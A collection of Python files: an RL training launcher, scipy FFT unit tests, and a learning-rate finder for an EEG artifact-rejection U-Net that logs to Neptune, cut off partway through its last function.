train copy.py
# Copyright (c) 2021, Xu Chen, FUNLab, Xiamen University
# All rights reserved.
import os
import torch
import numpy as np
import random
from pathlib import Path
from pprint import pprint
from torch.utils.tensorboard import SummaryWriter
import torch.multiprocessing as mp
from multiprocessing import Queue
from multiprocessing.sharedctypes import Value

from config import get_config
from common import make_env
from eval import evaluation

if __name__ == "__main__":

    # get specs
    parser = get_config()
    args = parser.parse_args()
    pprint(args)

    # cuda
    torch.set_num_threads(1)
    if args.cuda and torch.cuda.is_available():
        print("choose to use gpu...")
        device1 = torch.device("cuda:0")
        device2 = torch.device("cpu")
        torch.backends.cudnn.benchmark = False
        torch.backends.cudnn.deterministic = True
    else:
        print("choose to use cpu...")
        device1 = torch.device("cpu")
        device2 = torch.device("cpu")

    # dirs
    run_dir = args.run_dir
    assert isinstance(run_dir, Path)
    if not run_dir.exists():
        os.makedirs(str(run_dir))
    print(f"[train] run_dir is '{str(run_dir)}'.")

    method_dir = Path(os.path.join(run_dir, args.method))
    assert isinstance(method_dir, Path)
    if not method_dir.exists():
        os.makedirs(str(method_dir))
    print(f"[train] method_dir is '{str(method_dir)}'.")

    # tensorboard
    writer = SummaryWriter(log_dir=os.path.join(method_dir, "train_tb"))

    # seed
    torch.manual_seed(args.seed)
    torch.cuda.manual_seed_all(args.seed)
    np.random.seed(args.seed)
    random.seed(args.seed)

    # env
    env = make_env(args, "train")
    eval_env = make_env(args, "eval") if args.use_eval else None

    config = {
        "args": args,
        "run_dir": run_dir,
        "method_dir": method_dir,
        "env": env,
        "device": device1,
        "writer": writer,
    }
    eval_config = {
        "args": args,
        "run_dir": run_dir,
        "method_dir": method_dir,
        "env": eval_env,
        "device": device2,
        "writer": writer
    }

    if args.scenario == "pattern":
        from runners.pattern import Runner
    # elif args.scenario == "precise":
    #     from runners.precise import Runner

    runner = Runner("TrainRunner", config)
    eval_runner = Runner("EvalRunner", eval_config)

    # eval subprocess
    test_q = Queue()
    done_training = Value('i', False)
    p = mp.Process(target=evaluation, args=(args, eval_runner, test_q, done_training))
    p.start()

    runner.run(test_q)

    # close envs
    env.close()
    if args.use_eval and eval_env is not env:
        eval_env.close()
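For context, a minimal self-contained sketch of the trainer/evaluator handshake that train copy.py sets up: the training process pushes items into a multiprocessing Queue while a separate evaluation process drains it until a shared done flag is raised. The evaluation_loop function and the short producer loop are hypothetical stand-ins for eval.evaluation and runner.run(test_q); only the Queue/Value/Process wiring mirrors the file above.

import torch.multiprocessing as mp
from multiprocessing import Queue
from multiprocessing.sharedctypes import Value

def evaluation_loop(test_q, done_training):
    # stand-in for eval.evaluation: consume items until training signals completion
    while True:
        if not test_q.empty():
            item = test_q.get()
            print("evaluating", item)
        elif done_training.value:
            break

if __name__ == "__main__":
    test_q = Queue()
    done_training = Value('i', False)
    p = mp.Process(target=evaluation_loop, args=(test_q, done_training))
    p.start()
    for step in range(3):              # stand-in for runner.run(test_q) pushing results
        test_q.put({"step": step})
    done_training.value = True         # raised only after the last item has been queued
    p.join()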
test_numpy.py
from __future__ import division, absolute_import, print_function import queue import threading import multiprocessing import numpy as np import pytest from numpy.random import random from numpy.testing import ( assert_array_almost_equal, assert_array_equal, assert_allclose ) from pytest import raises as assert_raises import scipy.fft as fft def fft1(x): L = len(x) phase = -2j*np.pi*(np.arange(L)/float(L)) phase = np.arange(L).reshape(-1, 1) * phase return np.sum(x*np.exp(phase), axis=1) class TestFFTShift(object): def test_fft_n(self): assert_raises(ValueError, fft.fft, [1, 2, 3], 0) class TestFFT1D(object): def test_identity(self): maxlen = 512 x = random(maxlen) + 1j*random(maxlen) xr = random(maxlen) for i in range(1,maxlen): assert_array_almost_equal(fft.ifft(fft.fft(x[0:i])), x[0:i], decimal=12) assert_array_almost_equal(fft.irfft(fft.rfft(xr[0:i]),i), xr[0:i], decimal=12) def test_fft(self): x = random(30) + 1j*random(30) assert_array_almost_equal(fft1(x), fft.fft(x)) assert_array_almost_equal(fft1(x) / np.sqrt(30), fft.fft(x, norm="ortho")) def test_ifft(self): x = random(30) + 1j*random(30) assert_array_almost_equal(x, fft.ifft(fft.fft(x))) assert_array_almost_equal( x, fft.ifft(fft.fft(x, norm="ortho"), norm="ortho")) def test_fft2(self): x = random((30, 20)) + 1j*random((30, 20)) assert_array_almost_equal(fft.fft(fft.fft(x, axis=1), axis=0), fft.fft2(x)) assert_array_almost_equal(fft.fft2(x) / np.sqrt(30 * 20), fft.fft2(x, norm="ortho")) def test_ifft2(self): x = random((30, 20)) + 1j*random((30, 20)) assert_array_almost_equal(fft.ifft(fft.ifft(x, axis=1), axis=0), fft.ifft2(x)) assert_array_almost_equal(fft.ifft2(x) * np.sqrt(30 * 20), fft.ifft2(x, norm="ortho")) def test_fftn(self): x = random((30, 20, 10)) + 1j*random((30, 20, 10)) assert_array_almost_equal( fft.fft(fft.fft(fft.fft(x, axis=2), axis=1), axis=0), fft.fftn(x)) assert_array_almost_equal(fft.fftn(x) / np.sqrt(30 * 20 * 10), fft.fftn(x, norm="ortho")) def test_ifftn(self): x = random((30, 20, 10)) + 1j*random((30, 20, 10)) assert_array_almost_equal( fft.ifft(fft.ifft(fft.ifft(x, axis=2), axis=1), axis=0), fft.ifftn(x)) assert_array_almost_equal(fft.ifftn(x) * np.sqrt(30 * 20 * 10), fft.ifftn(x, norm="ortho")) def test_rfft(self): x = random(30) for n in [x.size, 2*x.size]: for norm in [None, 'ortho']: assert_array_almost_equal( fft.fft(x, n=n, norm=norm)[:(n//2 + 1)], fft.rfft(x, n=n, norm=norm)) assert_array_almost_equal(fft.rfft(x, n=n) / np.sqrt(n), fft.rfft(x, n=n, norm="ortho")) def test_irfft(self): x = random(30) assert_array_almost_equal(x, fft.irfft(fft.rfft(x))) assert_array_almost_equal( x, fft.irfft(fft.rfft(x, norm="ortho"), norm="ortho")) def test_rfft2(self): x = random((30, 20)) assert_array_almost_equal(fft.fft2(x)[:, :11], fft.rfft2(x)) assert_array_almost_equal(fft.rfft2(x) / np.sqrt(30 * 20), fft.rfft2(x, norm="ortho")) def test_irfft2(self): x = random((30, 20)) assert_array_almost_equal(x, fft.irfft2(fft.rfft2(x))) assert_array_almost_equal( x, fft.irfft2(fft.rfft2(x, norm="ortho"), norm="ortho")) def test_rfftn(self): x = random((30, 20, 10)) assert_array_almost_equal(fft.fftn(x)[:, :, :6], fft.rfftn(x)) assert_array_almost_equal(fft.rfftn(x) / np.sqrt(30 * 20 * 10), fft.rfftn(x, norm="ortho")) def test_irfftn(self): x = random((30, 20, 10)) assert_array_almost_equal(x, fft.irfftn(fft.rfftn(x))) assert_array_almost_equal( x, fft.irfftn(fft.rfftn(x, norm="ortho"), norm="ortho")) def test_hfft(self): x = random(14) + 1j*random(14) x_herm = np.concatenate((random(1), x, random(1))) x = 
np.concatenate((x_herm, x[::-1].conj())) assert_array_almost_equal(fft.fft(x), fft.hfft(x_herm)) assert_array_almost_equal(fft.hfft(x_herm) / np.sqrt(30), fft.hfft(x_herm, norm="ortho")) def test_ihfft(self): x = random(14) + 1j*random(14) x_herm = np.concatenate((random(1), x, random(1))) x = np.concatenate((x_herm, x[::-1].conj())) assert_array_almost_equal(x_herm, fft.ihfft(fft.hfft(x_herm))) assert_array_almost_equal( x_herm, fft.ihfft(fft.hfft(x_herm, norm="ortho"), norm="ortho")) def test_hfft2(self): x = random((30, 20)) assert_array_almost_equal(x, fft.hfft2(fft.ihfft2(x))) assert_array_almost_equal( x, fft.hfft2(fft.ihfft2(x, norm="ortho"), norm="ortho")) def test_ihfft2(self): x = random((30, 20)) assert_array_almost_equal(fft.ifft2(x)[:, :11], fft.ihfft2(x)) assert_array_almost_equal(fft.ihfft2(x) * np.sqrt(30 * 20), fft.ihfft2(x, norm="ortho")) def test_hfftn(self): x = random((30, 20, 10)) assert_array_almost_equal(x, fft.hfftn(fft.ihfftn(x))) assert_array_almost_equal( x, fft.hfftn(fft.ihfftn(x, norm="ortho"), norm="ortho")) def test_ihfftn(self): x = random((30, 20, 10)) assert_array_almost_equal(fft.ifftn(x)[:, :, :6], fft.ihfftn(x)) assert_array_almost_equal(fft.ihfftn(x) * np.sqrt(30 * 20 * 10), fft.ihfftn(x, norm="ortho")) @pytest.mark.parametrize("op", [fft.fftn, fft.ifftn, fft.rfftn, fft.irfftn, fft.hfftn, fft.ihfftn]) def test_axes(self, op): x = random((30, 20, 10)) axes = [(0, 1, 2), (0, 2, 1), (1, 0, 2), (1, 2, 0), (2, 0, 1), (2, 1, 0)] for a in axes: op_tr = op(np.transpose(x, a)) tr_op = np.transpose(op(x, axes=a), a) assert_array_almost_equal(op_tr, tr_op) def test_all_1d_norm_preserving(self): # verify that round-trip transforms are norm-preserving x = random(30) x_norm = np.linalg.norm(x) n = x.size * 2 func_pairs = [(fft.fft, fft.ifft), (fft.rfft, fft.irfft), # hfft: order so the first function takes x.size samples # (necessary for comparison to x_norm above) (fft.ihfft, fft.hfft), ] for forw, back in func_pairs: for n in [x.size, 2*x.size]: for norm in [None, 'ortho']: tmp = forw(x, n=n, norm=norm) tmp = back(tmp, n=n, norm=norm) assert_array_almost_equal(x_norm, np.linalg.norm(tmp)) @pytest.mark.parametrize("dtype", [np.half, np.single, np.double, np.longdouble]) def test_dtypes(self, dtype): # make sure that all input precisions are accepted x = random(30).astype(dtype) assert_array_almost_equal(fft.ifft(fft.fft(x)), x) assert_array_almost_equal(fft.irfft(fft.rfft(x)), x) assert_array_almost_equal(fft.hfft(fft.ihfft(x), len(x)), x) @pytest.mark.parametrize( "dtype", [np.float32, np.float64, np.longfloat, np.complex64, np.complex128, np.longcomplex]) @pytest.mark.parametrize("order", ["F", 'non-contiguous']) @pytest.mark.parametrize( "fft", [fft.fft, fft.fft2, fft.fftn, fft.ifft, fft.ifft2, fft.ifftn]) def test_fft_with_order(dtype, order, fft): # Check that FFT/IFFT produces identical results for C, Fortran and # non contiguous arrays rng = np.random.RandomState(42) X = rng.rand(8, 7, 13).astype(dtype, copy=False) if order == 'F': Y = np.asfortranarray(X) else: # Make a non contiguous array Y = X[::-1] X = np.ascontiguousarray(X[::-1]) if fft.__name__.endswith('fft'): for axis in range(3): X_res = fft(X, axis=axis) Y_res = fft(Y, axis=axis) assert_array_almost_equal(X_res, Y_res) elif fft.__name__.endswith(('fft2', 'fftn')): axes = [(0, 1), (1, 2), (0, 2)] if fft.__name__.endswith('fftn'): axes.extend([(0,), (1,), (2,), None]) for ax in axes: X_res = fft(X, axes=ax) Y_res = fft(Y, axes=ax) assert_array_almost_equal(X_res, Y_res) else: raise ValueError 
class TestFFTThreadSafe(object): threads = 16 input_shape = (800, 200) def _test_mtsame(self, func, *args): def worker(args, q): q.put(func(*args)) q = queue.Queue() expected = func(*args) # Spin off a bunch of threads to call the same function simultaneously t = [threading.Thread(target=worker, args=(args, q)) for i in range(self.threads)] [x.start() for x in t] [x.join() for x in t] # Make sure all threads returned the correct value for i in range(self.threads): assert_array_equal(q.get(timeout=5), expected, 'Function returned wrong value in multithreaded context') def test_fft(self): a = np.ones(self.input_shape) * 1+0j self._test_mtsame(fft.fft, a) def test_ifft(self): a = np.ones(self.input_shape) * 1+0j self._test_mtsame(fft.ifft, a) def test_rfft(self): a = np.ones(self.input_shape) self._test_mtsame(fft.rfft, a) def test_irfft(self): a = np.ones(self.input_shape) * 1+0j self._test_mtsame(fft.irfft, a) def test_hfft(self): a = np.ones(self.input_shape, np.complex64) self._test_mtsame(fft.hfft, a) def test_ihfft(self): a = np.ones(self.input_shape) self._test_mtsame(fft.ihfft, a) @pytest.mark.parametrize("func", [fft.fft, fft.ifft, fft.rfft, fft.irfft]) def test_multiprocess(func): # Test that fft still works after fork (gh-10422) with multiprocessing.Pool(2) as p: res = p.map(func, [np.ones(100) for _ in range(4)]) expect = func(np.ones(100)) for x in res: assert_allclose(x, expect) class TestIRFFTN(object): def test_not_last_axis_success(self): ar, ai = np.random.random((2, 16, 8, 32)) a = ar + 1j*ai axes = (-2,) # Should not raise error fft.irfftn(a, axes=axes)
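A tiny illustrative check (not part of the test suite above) of the convention those tests rely on throughout: scipy.fft's "ortho" normalization is the default forward transform divided by sqrt(n), which is what makes the round trips norm-preserving.

import numpy as np
import scipy.fft as fft

x = np.random.random(30)
# "ortho" forward transform equals the unnormalized one scaled by 1/sqrt(n)
assert np.allclose(fft.fft(x, norm="ortho"), fft.fft(x) / np.sqrt(30))
# and the orthonormal transform preserves the vector norm (Parseval)
assert np.isclose(np.linalg.norm(fft.fft(x, norm="ortho")), np.linalg.norm(x))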
1.Learning_rate_finder.py
import neptune.new as neptune import os import torch.nn as nn import torch import torch.nn.functional as F from torch.optim import SGD, Adam from torch.utils.data import DataLoader, random_split from torch.optim.lr_scheduler import CyclicLR, LambdaLR import torch.multiprocessing as mp import numpy as np import random import math import sys sys.path.append("..") # adds higher directory to python modules path from LoaderPACK.Unet_leaky import Unet_leaky, Unet_leaky_lstm from LoaderPACK.Loader import shuffle_5min from LoaderPACK.Accuarcy_finder import Accuarcy_find from LoaderPACK.Accuarcy_upload import Accuarcy_upload from multiprocessing import Process try: mp.set_start_method('spawn') except RuntimeError: pass def net_SGD1(device, fl, it, train_path, val_path): token = os.getenv('Neptune_api') run = neptune.init( project="NTLAB/artifact-rej-scalp", api_token=token, ) batch_size = 10 n_samples = 500 # how many samples do we collect train_load_file = shuffle_5min(path = train_path, series_dict = 'train_series_length.pickle', size = (195, 22, 2060000), device = device, length = n_samples) train_loader = torch.utils.data.DataLoader(train_load_file, batch_size=batch_size, shuffle=True, num_workers=0) val_load_file = shuffle_5min(path = val_path, series_dict = 'val_series_length.pickle', size = (28, 22, 549200), device = device, seed = 42, length = 50) val_loader = torch.utils.data.DataLoader(val_load_file, batch_size=batch_size, shuffle=False, num_workers=0) valid_loss, train_loss = [], [] smooth_valid_loss, smooth_train_loss = [], [] valid_acc = torch.tensor([]).to(device) train_acc = torch.tensor([]).to(device) nEpoch = 5 base_lr = 0.01 # where we start the learning rate max_lr = 1 # where the learning rate is supposed to end model = Unet_leaky_lstm(n_channels=1, batch_size=batch_size, \ device=device).to(device) # model = Unet_leaky(n_channels=1, n_classes=2).to(device) optimizer = SGD(model.parameters(), lr=base_lr) lossFunc = nn.CrossEntropyLoss(weight = torch.tensor([1., 5.]).to(device), reduction = "mean") scheduler = CyclicLR(optimizer, base_lr=base_lr, max_lr=max_lr, step_size_up=nEpoch*(n_samples/batch_size)-1, cycle_momentum=False) # step_size_up is set so the learning rate is updated linearly smooth = 0.05 params = {"optimizer":"SGD", "batch_size":batch_size, "optimizer_learning_rate": base_lr, "loss_function":"CrossEntropyLoss", "loss_function_weights":[1, 5], "loss_function_reduction":"mean", "model":"Unet_leaky_lstm", "scheduler":"CyclicLR", "scheduler_base_lr":base_lr, "scheduler_max_lr":max_lr, "scheduler_cycle_momentum":False, "scheduler_step_size_up":nEpoch*(n_samples/batch_size)-1, "smooting_loss":smooth} run[f"network_SGD/parameters"] = params first_loss_save = True for iEpoch in range(nEpoch): print(f"Training epoch {iEpoch}") for series in train_loader: run[f"network_SGD/learning_rate"].log( optimizer.param_groups[0]['lr']) t_mat = torch.zeros(2, 2) total_pos, total_neg = torch.tensor(0), torch.tensor(0) ind, tar, chan = series y_pred = model(ind) model.zero_grad() pred = y_pred.transpose(1, 2).reshape(-1, 2).type(fl) target = tar.view(-1).type(it) loss = lossFunc(pred, target) if first_loss_save: run[f"network_SGD/train_loss_pr_file"].log(loss) run[f"network_SGD/smooth_train_loss_pr_file"].log(loss) smooth_train_loss.append(loss.item()) run[f"network_SGD/validation_loss_pr_file"].log(loss) run[f"network_SGD/smooth_val_loss_pr_file"].log(loss) smooth_valid_loss.append(loss.item()) first_loss_save = False loss.backward() optimizer.step() train_loss.append(loss.item()) acc, 
mat, tot_p_g, tot_n_g = Accuarcy_find(y_pred, tar, device) train_acc = torch.cat((train_acc, acc.view(1))) t_mat = t_mat + mat total_pos = total_pos + tot_p_g total_neg = total_neg + tot_n_g run[f"network_SGD/train_loss_pr_file"].log( np.mean(np.array(train_loss))) train_loss = [] sm_loss = loss.item() * smooth + (1-smooth) * smooth_train_loss[-1] smooth_train_loss.append(sm_loss) run[f"network_SGD/smooth_train_loss_pr_file"].log(sm_loss) run[f"network_SGD/train_acc_pr_file"].log(torch.mean(train_acc)) train_acc = torch.tensor([]).to(device) run[f"network_SGD/matrix/train_confusion_matrix_pr_file"].log(t_mat) Accuarcy_upload(run, t_mat, total_pos, total_neg, "network_SGD", "train") v_mat = torch.zeros(2,2) total_pos, total_neg = torch.tensor(0), torch.tensor(0) for series in val_loader: ind, tar, chan = series y_pred = model(ind) pred = y_pred.transpose(1, 2).reshape(-1, 2).type(fl) target = tar.view(-1).type(it) loss = lossFunc(pred, target) valid_loss.append(loss.item()) acc, mat, tot_p_g, tot_n_g = Accuarcy_find(y_pred, tar, device) valid_acc = torch.cat((valid_acc, acc.view(1))) v_mat = v_mat + mat total_pos = total_pos + tot_p_g total_neg = total_neg + tot_n_g run[f"network_SGD/validation_loss_pr_file"].log( np.mean(np.array(valid_loss))) sm_loss = np.mean(np.array(valid_loss)) * smooth \ + (1-smooth) * smooth_valid_loss[-1] smooth_valid_loss.append(sm_loss) run[f"network_SGD/smooth_val_loss_pr_file"].log(sm_loss) valid_loss = [] run[f"network_SGD/val_acc_pr_file"].log(torch.mean(valid_acc)) valid_acc = torch.tensor([]).to(device) run[f"network_SGD/matrix/val_confusion_matrix_pr_file"].log(v_mat) Accuarcy_upload(run, v_mat, total_pos, total_neg, "network_SGD", "val") scheduler.step() run.stop() def net_SGD2(device, fl, it, train_path, val_path): token = os.getenv('Neptune_api') run = neptune.init( project="NTLAB/artifact-rej-scalp", api_token=token, ) batch_size = 10 n_samples = 500 # how many samples do we collect train_load_file = shuffle_5min(path = train_path, series_dict = 'train_series_length.pickle', size = (195, 22, 2060000), device = device, length = n_samples) train_loader = torch.utils.data.DataLoader(train_load_file, batch_size=batch_size, shuffle=True, num_workers=0) val_load_file = shuffle_5min(path = val_path, series_dict = 'val_series_length.pickle', size = (28, 22, 549200), device = device, seed = 42, length = 50) val_loader = torch.utils.data.DataLoader(val_load_file, batch_size=batch_size, shuffle=False, num_workers=0) valid_loss, train_loss = [], [] smooth_valid_loss, smooth_train_loss = [], [] valid_acc = torch.tensor([]).to(device) train_acc = torch.tensor([]).to(device) nEpoch = 5 base_lr = 0.01 # where we start the learning rate max_lr = 1 # where the learning rate is supposed to end model = Unet_leaky_lstm(n_channels=1, batch_size=batch_size, \ device=device).to(device) # model = Unet_leaky(n_channels=1, n_classes=2).to(device) optimizer = SGD(model.parameters(), lr=base_lr) lossFunc = nn.CrossEntropyLoss(weight = torch.tensor([1., 5.]).to(device), reduction = "mean") lam = lambda x: math.exp(x*math.log(max_lr / base_lr) \ / (nEpoch*n_samples / batch_size)) scheduler = LambdaLR(optimizer, lam) # implement the exponential learning rate smooth = 0.05 params = {"optimizer":"SGD", "batch_size":batch_size, "optimizer_learning_rate": base_lr, "loss_function":"CrossEntropyLoss", "loss_function_weights":[1, 5], "loss_function_reduction":"mean", "model":"Unet_leaky_lstm", "scheduler":"Exponential", "scheduler_base_lr":base_lr, "scheduler_max_lr":max_lr, 
"smooting_loss":smooth} run[f"network_SGD/parameters"] = params first_loss_save = True for iEpoch in range(nEpoch): print(f"Training epoch {iEpoch}") for series in train_loader: run[f"network_SGD/learning_rate"].log( optimizer.param_groups[0]['lr']) t_mat = torch.zeros(2, 2) total_pos, total_neg = torch.tensor(0), torch.tensor(0) ind, tar, chan = series y_pred = model(ind) model.zero_grad() pred = y_pred.transpose(1, 2).reshape(-1, 2).type(fl) target = tar.view(-1).type(it) loss = lossFunc(pred, target) if first_loss_save: run[f"network_SGD/train_loss_pr_file"].log(loss) run[f"network_SGD/smooth_train_loss_pr_file"].log(loss) smooth_train_loss.append(loss.item()) run[f"network_SGD/validation_loss_pr_file"].log(loss) run[f"network_SGD/smooth_val_loss_pr_file"].log(loss) smooth_valid_loss.append(loss.item()) first_loss_save = False loss.backward() optimizer.step() train_loss.append(loss.item()) acc, mat, tot_p_g, tot_n_g = Accuarcy_find(y_pred, tar, device) train_acc = torch.cat((train_acc, acc.view(1))) t_mat = t_mat + mat total_pos = total_pos + tot_p_g total_neg = total_neg + tot_n_g run[f"network_SGD/train_loss_pr_file"].log( np.mean(np.array(train_loss))) train_loss = [] sm_loss = loss.item() * smooth + (1-smooth) * smooth_train_loss[-1] smooth_train_loss.append(sm_loss) run[f"network_SGD/smooth_train_loss_pr_file"].log(sm_loss) run[f"network_SGD/train_acc_pr_file"].log(torch.mean(train_acc)) train_acc = torch.tensor([]).to(device) run[f"network_SGD/matrix/train_confusion_matrix_pr_file"].log(t_mat) Accuarcy_upload(run, t_mat, total_pos, total_neg, "network_SGD", "train") v_mat = torch.zeros(2,2) total_pos, total_neg = torch.tensor(0), torch.tensor(0) for series in val_loader: ind, tar, chan = series y_pred = model(ind) pred = y_pred.transpose(1, 2).reshape(-1, 2).type(fl) target = tar.view(-1).type(it) loss = lossFunc(pred, target) valid_loss.append(loss.item()) acc, mat, tot_p_g, tot_n_g = Accuarcy_find(y_pred, tar, device) valid_acc = torch.cat((valid_acc, acc.view(1))) v_mat = v_mat + mat total_pos = total_pos + tot_p_g total_neg = total_neg + tot_n_g run[f"network_SGD/validation_loss_pr_file"].log( np.mean(np.array(valid_loss))) sm_loss = np.mean(np.array(valid_loss)) * smooth \ + (1-smooth) * smooth_valid_loss[-1] smooth_valid_loss.append(sm_loss) run[f"network_SGD/smooth_val_loss_pr_file"].log(sm_loss) valid_loss = [] run[f"network_SGD/val_acc_pr_file"].log(torch.mean(valid_acc)) valid_acc = torch.tensor([]).to(device) run[f"network_SGD/matrix/val_confusion_matrix_pr_file"].log(v_mat) Accuarcy_upload(run, v_mat, total_pos, total_neg, "network_SGD", "val") scheduler.step() run.stop() def net_ADAM1(device, fl, it, train_path, val_path): token = os.getenv('Neptune_api') run = neptune.init( project="NTLAB/artifact-rej-scalp", api_token=token, ) batch_size = 10 n_samples = 500 # how many samples do we collect train_load_file = shuffle_5min(path = train_path, series_dict = 'train_series_length.pickle', size = (195, 22, 2060000), device = device, length = n_samples) train_loader = torch.utils.data.DataLoader(train_load_file, batch_size=batch_size, shuffle=True, num_workers=0) val_load_file = shuffle_5min(path = val_path, series_dict = 'val_series_length.pickle', size = (28, 22, 549200), device = device, seed = 42, length = 50) val_loader = torch.utils.data.DataLoader(val_load_file, batch_size=batch_size, shuffle=False, num_workers=0) valid_loss, train_loss = [], [] smooth_valid_loss, smooth_train_loss = [], [] valid_acc = torch.tensor([]).to(device) train_acc = 
torch.tensor([]).to(device) nEpoch = 5 base_lr = 0.0000000001 # where we start the learning rate max_lr = 0.1 # where the learning rate is supposed to end model = Unet_leaky_lstm(n_channels=1, batch_size=batch_size, \ device=device).to(device) # model = Unet_leaky(n_channels=1, n_classes=2).to(device) optimizer = Adam(model.parameters(), lr=base_lr) lossFunc = nn.CrossEntropyLoss(weight = torch.tensor([1., 5.]).to(device), reduction = "mean") scheduler = CyclicLR(optimizer, base_lr=base_lr, max_lr=max_lr, step_size_up=nEpoch*(n_samples/batch_size)-1, cycle_momentum=False) # step_size_up is set accordingly to how often we update the learning rate smooth = 0.05 params = {"optimizer":"Adam", "batch_size":batch_size, "optimizer_learning_rate": base_lr, "loss_function":"CrossEntropyLoss", "loss_function_weights":[1, 5], "loss_function_reduction":"mean", "model":"Unet_leaky_lstm", "scheduler":"CyclicLR", "scheduler_cycle_momentum":False, "scheduler_base_lr":base_lr, "scheduler_max_lr":max_lr, "scheduler_step_size_up":nEpoch*(n_samples/batch_size)-1, "smooting_loss":smooth} run[f"network_ADAM/parameters"] = params first_loss_save = True for iEpoch in range(nEpoch): print(f"Training epoch {iEpoch}") for series in train_loader: run[f"network_ADAM/learning_rate"].log( optimizer.param_groups[0]['lr']) t_mat = torch.zeros(2, 2) total_pos, total_neg = torch.tensor(0), torch.tensor(0) ind, tar, chan = series y_pred = model(ind) model.zero_grad() pred = y_pred.transpose(1, 2).reshape(-1, 2).type(fl) target = tar.view(-1).type(it) loss = lossFunc(pred, target) loss.backward() if first_loss_save: run[f"network_ADAM/train_loss_pr_file"].log(loss) run[f"network_ADAM/smooth_train_loss_pr_file"].log(loss) smooth_train_loss.append(loss.item()) run[f"network_ADAM/validation_loss_pr_file"].log(loss) run[f"network_ADAM/smooth_val_loss_pr_file"].log(loss) smooth_valid_loss.append(loss.item()) first_loss_save = False optimizer.step() train_loss.append(loss.item()) acc, mat, tot_p_g, tot_n_g = Accuarcy_find(y_pred, tar, device) train_acc = torch.cat((train_acc, acc.view(1))) t_mat = t_mat + mat total_pos = total_pos + tot_p_g total_neg = total_neg + tot_n_g #print(tot_n) #print(total_neg_train) run[f"network_ADAM/train_loss_pr_file"].log( np.mean(np.array(train_loss))) train_loss = [] sm_loss = loss.item() * smooth + (1-smooth) * smooth_train_loss[-1] smooth_train_loss.append(sm_loss) run[f"network_ADAM/smooth_train_loss_pr_file"].log(sm_loss) run[f"network_ADAM/train_acc_pr_file"].log(torch.mean(train_acc)) train_acc = torch.tensor([]).to(device) run[f"network_ADAM/matrix/train_confusion_matrix_pr_file"].log( t_mat) Accuarcy_upload(run, t_mat, total_pos, total_neg, "network_ADAM", "train") v_mat = torch.zeros(2,2) total_pos, total_neg = torch.tensor(0), torch.tensor(0) for series in val_loader: ind, tar, chan = series y_pred = model(ind) pred = y_pred.transpose(1, 2).reshape(-1, 2).type(fl) target = tar.view(-1).type(it) loss = lossFunc(pred, target) valid_loss.append(loss.item()) acc, mat, tot_p_g, tot_n_g = Accuarcy_find(y_pred, tar, device) valid_acc = torch.cat((valid_acc, acc.view(1))) v_mat = v_mat + mat total_pos = total_pos + tot_p_g total_neg = total_neg + tot_n_g run[f"network_ADAM/validation_loss_pr_file"].log( np.mean(np.array(valid_loss))) sm_loss = np.mean(np.array(valid_loss)) * smooth \ + (1-smooth) * smooth_train_loss[-1] smooth_train_loss.append(sm_loss) run[f"network_ADAM/smooth_val_loss_pr_file"].log(sm_loss) valid_loss = [] run[f"network_ADAM/val_acc_pr_file"].log(torch.mean(valid_acc)) 
valid_acc = torch.tensor([]).to(device) run[f"network_ADAM/matrix/val_confusion_matrix_pr_file"].log(v_mat) Accuarcy_upload(run, v_mat, total_pos, total_neg, "network_ADAM", "val") scheduler.step() run.stop() def net_ADAM2(device, fl, it, train_path, val_path): token = os.getenv('Neptune_api') run = neptune.init( project="NTLAB/artifact-rej-scalp", api_token=token, ) batch_size = 10 n_samples = 500 # how many samples do we collect train_load_file = shuffle_5min(path = train_path, series_dict = 'train_series_length.pickle', size = (195, 22, 2060000), device = device, length = n_samples) train_loader = torch.utils.data.DataLoader(train_load_file, batch_size=batch_size, shuffle=True, num_workers=0) val_load_file = shuffle_5min(path = val_path, series_dict = 'val_series_length.pickle', size = (28, 22, 549200), device = device, seed = 42, length = 50) val_loader = torch.utils.data.DataLoader(val_load_file, batch_size=batch_size, shuffle=False, num_workers=0) valid_loss, train_loss = [], [] smooth_valid_loss, smooth_train_loss = [], [] valid_acc = torch.tensor([]).to(device) train_acc = torch.tensor([]).to(device) nEpoch = 5 base_lr = 0.0001 # where we start the learning rate max_lr = 0.7 # where the learning rate is supposed to end model = Unet_leaky_lstm(n_channels=1, batch_size=batch_size, \ device=device).to(device) # model = Unet_leaky(n_channels=1, n_classes=2).to(device) optimizer = Adam(model.parameters(), lr=base_lr) lossFunc = nn.CrossEntropyLoss(weight = torch.tensor([1., 5.]).to(device), reduction = "mean") lam = lambda x: math.exp(x*math.log(max_lr / base_lr) \ / (nEpoch*n_samples / batch_size)) scheduler = LambdaLR(optimizer, lam) # implement the exponential learning rate smooth = 0.05 params = {"optimizer":"Adam", "batch_size":batch_size, "optimizer_learning_rate": base_lr, "loss_function":"CrossEntropyLoss", "loss_function_weights":[1, 5], "loss_function_reduction":"mean", "model":"Unet_leaky_lstm", "scheduler":"Exponential", "scheduler_base_lr":base_lr, "scheduler_max_lr":max_lr, "smooting_loss":smooth} run[f"network_ADAM/parameters"] = params first_loss_save = True for iEpoch in range(nEpoch): print(f"Training epoch {iEpoch}") for series in train_loader: run[f"network_ADAM/learning_rate"].log( optimizer.param_groups[0]['lr']) t_mat = torch.zeros(2, 2) total_pos, total_neg = torch.tensor(0), torch.tensor(0) ind, tar, chan = series y_pred = model(ind) model.zero_grad() pred = y_pred.transpose(1, 2).reshape(-1, 2).type(fl) target = tar.view(-1).type(it) loss = lossFunc(pred, target) loss.backward() if first_loss_save: run[f"network_ADAM/train_loss_pr_file"].log(loss) run[f"network_ADAM/smooth_train_loss_pr_file"].log(loss) smooth_train_loss.append(loss.item()) run[f"network_ADAM/validation_loss_pr_file"].log(loss) run[f"network_ADAM/smooth_val_loss_pr_file"].log(loss) smooth_valid_loss.append(loss.item()) first_loss_save = False optimizer.step() train_loss.append(loss.item()) acc, mat, tot_p_g, tot_n_g = Accuarcy_find(y_pred, tar, device) train_acc = torch.cat((train_acc, acc.view(1))) t_mat = t_mat + mat total_pos = total_pos + tot_p_g total_neg = total_neg + tot_n_g #print(tot_n) #print(total_neg_train) run[f"network_ADAM/train_loss_pr_file"].log( np.mean(np.array(train_loss))) train_loss = [] sm_loss = loss.item() * smooth + (1-smooth) * smooth_train_loss[-1] smooth_train_loss.append(sm_loss) run[f"network_ADAM/smooth_train_loss_pr_file"].log(sm_loss) run[f"network_ADAM/train_acc_pr_file"].log(torch.mean(train_acc)) train_acc = torch.tensor([]).to(device) 
